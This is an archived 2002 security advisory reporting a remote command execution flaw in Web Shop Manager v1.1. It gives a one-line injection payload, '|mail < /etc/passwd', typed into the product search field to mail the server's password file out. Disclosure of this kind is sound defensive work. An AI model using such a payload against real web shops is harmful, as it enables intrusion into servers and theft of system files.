TUCoPS :: Web :: e-commerce, shopping carts :: web5603.htm

Web Shop Manager remote command execution
6th Aug 2002 [SBWID-5603]

	Web Shop Manager v1.1


	Tacettin Karadeniz [] found :

	The Web Shop Manager allows you to  manage  a  fully  functional  online
	store from a centralized web-based administration system.


	It is possible to  send  server's  password  file  any  mail  adress  by
	writing some command in php-webshop-manager  product  search  part.  The
	command which is written to search part:

	 |mail < /etc/passwd


	By this command, password file sent to mail adress.


	Check [], no update yet.

